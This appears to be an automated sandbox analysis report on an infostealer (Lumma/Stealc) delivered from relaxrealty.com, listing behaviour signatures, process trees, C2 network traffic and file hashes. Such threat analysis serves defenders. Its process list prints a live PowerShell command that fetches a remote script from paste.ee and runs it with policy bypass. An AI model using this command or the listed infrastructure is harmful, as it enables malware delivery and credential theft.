Analysis Overview
Threat Level: Known bad
The file http://relaxrealty.com/download.php was found to be: Known bad.
Malicious Activity Summary
Lumma Stealer, LummaC
Stealc
Blocklisted process makes network request
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
Unsecured Credentials: Credentials In Files
Indicator Removal: File Deletion
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Drops file in Program Files directory
Subvert Trust Controls: Mark-of-the-Web Bypass
System Location Discovery: System Language Discovery
Checks processor information in registry
NTFS ADS
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-15 19:14
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-15 19:14
Reported
2024-10-15 19:20
Platform
win10v2004-20241007-en
Max time kernel
366s
Max time network
304s
Command Line
Signatures
Lumma Stealer, LummaC
Stealc
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Installation_x64.exe | N/A |
| N/A | N/A | C:\Program Files\LDPW\1.exe | N/A |
| N/A | N/A | C:\Program Files\LDPW\2.exe | N/A |
| N/A | N/A | C:\Program Files\LDPW\3.exe | N/A |
Loads dropped DLL
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Indicator Removal: File Deletion
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3552 set thread context of 4300 | N/A | C:\Program Files\LDPW\1.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2604 set thread context of 4680 | N/A | C:\Program Files\LDPW\2.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2340 set thread context of 3356 | N/A | C:\Program Files\LDPW\3.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\LDPW\1.exe | C:\Users\Admin\Downloads\Installation_x64.exe | N/A |
| File created | C:\Program Files\LDPW\2.exe | C:\Users\Admin\Downloads\Installation_x64.exe | N/A |
| File created | C:\Program Files\LDPW\3.exe | C:\Users\Admin\Downloads\Installation_x64.exe | N/A |
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\Installation_x64.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\LDPW\1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\whoami.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\LDPW\2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\LDPW\3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\Installation_x64.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Installation_x64.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://relaxrealty.com/download.php"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://relaxrealty.com/download.php
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2020 -parentBuildID 20240401114208 -prefsHandle 1948 -prefMapHandle 1940 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0fbb3ee1-ac94-4752-a103-9a98674122d9} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 2320 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ce8d57d-8d2d-45e0-b70c-a7f6a8cb6711} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2996 -childID 1 -isForBrowser -prefsHandle 2988 -prefMapHandle 2984 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27491e52-7cd0-4334-9324-bfcef4ec62d6} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3912 -childID 2 -isForBrowser -prefsHandle 3904 -prefMapHandle 3900 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e03fc959-d716-43fe-bd97-c859f65141a4} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4720 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4712 -prefMapHandle 4704 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e6d5370-193e-442d-947e-a538efabc24f} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5404 -childID 3 -isForBrowser -prefsHandle 5436 -prefMapHandle 5432 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a15102dc-2d22-4e45-83f8-05cdcd42f329} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5532 -childID 4 -isForBrowser -prefsHandle 5560 -prefMapHandle 5416 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1d08f2a-697c-4a98-b75b-b14f6742e415} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5780 -childID 5 -isForBrowser -prefsHandle 5856 -prefMapHandle 5852 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8ecb176-663f-45c7-b5ef-6b9d8e5142d0} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\Installation_x64.exe
"C:\Users\Admin\Downloads\Installation_x64.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe"
C:\Program Files\LDPW\1.exe
"C:\Program Files\LDPW\1.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Program Files\LDPW\2.exe
"C:\Program Files\LDPW\2.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Program Files\LDPW\3.exe
"C:\Program Files\LDPW\3.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\SysWOW64\whoami.exe
"C:\Windows\system32\whoami.exe" /groups /fo csv
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:53871 | tcp | |
| US | 8.8.8.8:53 | relaxrealty.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | 133.190.18.2.in-addr.arpa | udp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | tcp |
| FI | 95.216.241.251:80 | relaxrealty.com | tcp |
| FI | 95.216.241.251:80 | relaxrealty.com | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | relaxrealty.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | tcp |
| US | 8.8.8.8:53 | relaxrealty.com | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| FI | 95.216.241.251:443 | relaxrealty.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| FI | 95.216.241.251:443 | relaxrealty.com | tcp |
| US | 8.8.8.8:53 | 251.241.216.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.161.26.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | squeezetopsusa.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| FI | 95.216.241.251:443 | squeezetopsusa.com | tcp |
| US | 8.8.8.8:53 | squeezetopsusa.com | udp |
| US | 8.8.8.8:53 | squeezetopsusa.com | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:53881 | tcp | |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| DE | 23.55.161.211:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | 211.161.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 142.250.200.46:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 142.250.200.46:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| GB | 142.250.200.46:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r4---sn-aigl6ner.gvt1.com | udp |
| GB | 173.194.183.137:443 | r4---sn-aigl6ner.gvt1.com | tcp |
| US | 8.8.8.8:53 | r4.sn-aigl6ner.gvt1.com | udp |
| US | 8.8.8.8:53 | r4.sn-aigl6ner.gvt1.com | udp |
| GB | 173.194.183.137:443 | r4.sn-aigl6ner.gvt1.com | udp |
| US | 8.8.8.8:53 | 137.183.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 35.190.72.216:443 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 216.72.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | xilloolli.com | udp |
| US | 104.21.9.210:80 | xilloolli.com | tcp |
| US | 8.8.8.8:53 | 210.9.21.104.in-addr.arpa | udp |
| US | 104.21.9.210:80 | xilloolli.com | tcp |
| US | 8.8.8.8:53 | cdn-gravitiumgame.xyz | udp |
| US | 104.21.84.91:443 | cdn-gravitiumgame.xyz | tcp |
| US | 8.8.8.8:53 | 91.84.21.104.in-addr.arpa | udp |
| US | 104.21.9.210:80 | xilloolli.com | tcp |
| US | 8.8.8.8:53 | mysticsmirage.com | udp |
| US | 104.21.4.233:443 | mysticsmirage.com | tcp |
| US | 8.8.8.8:53 | 233.4.21.104.in-addr.arpa | udp |
| US | 104.21.9.210:80 | xilloolli.com | tcp |
| US | 104.21.9.210:80 | xilloolli.com | tcp |
| US | 104.21.9.210:80 | xilloolli.com | tcp |
| US | 104.21.4.233:443 | mysticsmirage.com | tcp |
| US | 8.8.8.8:53 | shootyprovedn.biz | udp |
| US | 104.21.90.42:443 | shootyprovedn.biz | tcp |
| US | 8.8.8.8:53 | 42.90.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mathcucom.sbs | udp |
| US | 8.8.8.8:53 | allocatinow.sbs | udp |
| US | 8.8.8.8:53 | enlargkiw.sbs | udp |
| US | 8.8.8.8:53 | resinedyw.sbs | udp |
| US | 8.8.8.8:53 | vennurviot.sbs | udp |
| US | 8.8.8.8:53 | ehticsprocw.sbs | udp |
| US | 8.8.8.8:53 | condifendteu.sbs | udp |
| US | 8.8.8.8:53 | drawwyobstacw.sbs | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 109.234.82.104.in-addr.arpa | udp |
| US | 104.21.9.210:80 | xilloolli.com | tcp |
| US | 104.21.9.210:80 | xilloolli.com | tcp |
| US | 104.21.9.210:80 | xilloolli.com | tcp |
| US | 104.21.4.233:443 | mysticsmirage.com | tcp |
| ES | 95.182.96.50:80 | 95.182.96.50 | tcp |
| US | 8.8.8.8:53 | 50.96.182.95.in-addr.arpa | udp |
| US | 104.21.9.210:80 | xilloolli.com | tcp |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 172.67.187.200:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | 200.187.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.246.116.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\4defcc7e-0668-41d8-9807-bce8a6e82aeb
| MD5 | d0a9271e19ba4d0f6c6ef3fc6b2f0e37 |
| SHA1 | 7b6a7d09d81b9d3ddbf2a883f648233682bfd345 |
| SHA256 | 38f3164bb28da1de874c2bcd3dad44a859db856eed99b3e767b19f840a0b99f2 |
| SHA512 | 03d0281f264cbecd0042b572e7be418d7dcf875d738eb850e60ceaee96918f44b18e3004ee4584e9abb22ee33ecbad940b294b0e3943ecd409ac51c63526249b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\6a259bb3-a633-4bfd-99e2-0e61fbaada98
| MD5 | 88501986f113103884c371a1b68730b9 |
| SHA1 | 44c17f70d398c58aa9a28254e2a2f5df923bce6b |
| SHA256 | bfab2f3893fc3d0882d85dd329cd102c9d6dbf37ce365617505d96c4c7a58b94 |
| SHA512 | 35a439add4b636b73cbc23fb236e93ac737e8814564ca2d21b47c267509604e7bdb7b9ab4f582cbb597a2b9744029a465c2cd83385648093239e9f877d254ee2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\172c7592-abeb-4f01-b0d0-bb1d89543020
| MD5 | 10e81d82125136a41428489764c37d41 |
| SHA1 | 152427e864464ea9ca9a70c14b2e47d2ac1e62df |
| SHA256 | 2b2865ee617cf7d3eea43894ec9052e35ee262a954a8e307103d8687e3b02edd |
| SHA512 | 83f24d180d7f219aa5c420b40abd1cce3e6e3174867cc059e4635c96b537cea7ed73095bc7639b89ccb491a357b717a1ec88a409eaa038f7d70b592cf5482c28 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | fa86d3127b05fa5b4cfa5c1620244020 |
| SHA1 | 326bcaeedb610b86cffdcbae2d4d7990b922d621 |
| SHA256 | a1802991b20be3028cf54b14b4bcf0bb66e4b2e6801c27a154c385bd9364b237 |
| SHA512 | 2f84a4f9e97faed3a03ec91d39b91a301fbcd4da830bbb175d52c3f6ce4cc1d0ef8fc2da99eba662e1609b5950e35dc104a14123aecdccec47dbcb97c5797e99 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g9per00b.default-release\activity-stream.discovery_stream.json
| MD5 | 6803de8259cf8a7dd911ab86170e8978 |
| SHA1 | 6918ee30f59e745b57cff995c8b88cb68426efc6 |
| SHA256 | e10592ce35a232ce83a29995687b782dc4df6147daf676f5d4db136dc7c9690e |
| SHA512 | 407d9bfe6d5b64ca1227062cd3519176b7cb175279e2a8b10a1a22c4597864bc1ef52c2611a7bbf8b97d2491c02bd82a416f816cbcb9252f4ceeaa3a781891f6 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js
| MD5 | 642da0358f4719ee4b4790c05d4a7cc5 |
| SHA1 | a2dac4cab10b74eae44107f6c519993b9dc780b9 |
| SHA256 | 61241dc71f65638429da6afaf9fbb15d530aaa860bf9bd4f1b7492c465cbe074 |
| SHA512 | adb5994094e459b427e0896dfb42e755ff609404d1642052f5d489858cd1fdbb574bd78897feb97af58ae7098cda8c55bc3fe30f120f7dae9abddeb3a7e39d2d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js
| MD5 | 666fcc5290d4be92abefa4cdaee078ee |
| SHA1 | 58c0c51a405a3d6ec7e3d09c56a72f5a5440bd5c |
| SHA256 | 71cc51c2157168ea4a5f41b7ce2b07bb0ba562288ab5093d85e4bf61ae0be7d0 |
| SHA512 | a6437382c960c2e6f306e08fb0454a3fdc17954d84e9fe346d8f25f993a10a8f0ea550fe47a34696d6f9b0a66e9c4a0a6d7300cd9d174912dd4cce6375c2293d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 13e5d7ceb89a4097ae35f82e0580cd88 |
| SHA1 | 954b26c46496bfdd7126c259612f50326bd462f6 |
| SHA256 | 2397e0bf9b68709d0cd4e119ce588c23727d358331ab78b665342a2a93477a5f |
| SHA512 | e88acd7a359fd1e2ba4d203cc817c1304859039b774d06632ae1cc4696a7b3119f7587decd9b56f972c778ee8c4696802f54aaf8790d67a54057517b3d676e95 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js
| MD5 | 574c4ed762e00d262e2578cdd179f284 |
| SHA1 | c1acdc51ed8210ffdf4d6b468bc074abb58ecfee |
| SHA256 | f531588be12be03484d3dcd22c8dfc2f02a4f74cd8da810664ba6daac16371cf |
| SHA512 | c559d3796d1e71caf28b58438087b9392514bdda59532afe9167aadaebad1fac8be908882b84afa2a245c0d3513fefd2681d9c1a9443b90aa2fbfbc1fbf4ec95 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g9per00b.default-release\cache2\entries\0305BF7FE660AF5F32B4319E4C7EF7A7B70257A3
| MD5 | d169a409dd9a04692f89a73556eb1a6c |
| SHA1 | 26eb3390ec7c150bb8cfdc97dc48dd4e32f8178c |
| SHA256 | 808f2f6a632666e1d7ca6f07ee4788ab452966f63a81edf56e7bf37abe32b95a |
| SHA512 | 67affd6c921174649c757b5f2f84a959fd3097e98c8e10b6191c40c874af8b285505c228c91abf6cdb97a2b81fdb001c6766712bdf9d5704300f894e36279f18 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
